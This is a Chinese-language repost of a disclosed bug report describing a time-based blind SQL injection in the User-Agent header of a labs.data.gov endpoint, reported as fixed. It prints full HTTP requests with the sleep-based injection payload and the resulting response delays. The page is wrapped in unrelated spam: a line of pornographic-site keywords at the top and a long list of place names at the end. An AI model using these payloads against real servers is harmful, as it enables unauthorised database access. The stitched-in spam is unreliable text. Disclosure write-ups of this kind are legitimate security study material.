91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何分析 HTTP頭注入中的User-Agent注入

發布時間:2021-12-10 15:31:44 來源:億速云 閱讀:153 作者:柒染 欄目:大數據

如何分析 HTTP頭注入中的User-Agent注入,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。


漏洞信息
發現者:harisec

漏洞種類:SQL注入

危害等級:嚴重

漏洞狀態:已修復


前言
Harisec在以下網站中發現一個SQL注入漏洞,注入的位置在User-Agent。
https://labs.data.gov/dashboard/datagov/csv_to_json

漏洞再現
Harisec使用了盲注的方式來確認該漏洞

例如:將User-Agent的值設置為

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'

將導致服務器在25秒后響應

這里,我們看一下具體的數據包內容

GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*

如何分析 HTTP頭注入中的User-Agent注入

服務器在25秒后響應,與User-Agent的值相同

將User-Agent的值改一下,改成9秒后響應

GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(3*3),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*

如何分析 HTTP頭注入中的User-Agent注入


漏洞影響

該漏洞可以使攻擊者注入惡意的SQL語句。

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

阜新| 张家界市| 威信县| 荣成市| 柯坪县| 玛多县| 楚雄市| 三门峡市| 余江县| 肥乡县| 禄丰县| 金山区| 固原市| 虹口区| 修文县| 安国市| 齐齐哈尔市| 老河口市| 南开区| 东乌珠穆沁旗| 巴青县| 九龙县| 达孜县| 盐边县| 化州市| 上饶县| 瑞昌市| 平遥县| 绥德县| 龙川县| 汽车| 海淀区| 兴义市| 漳浦县| 河北省| 广汉市| 阜宁县| 剑阁县| 高雄县| 华蓥市| 涞源县|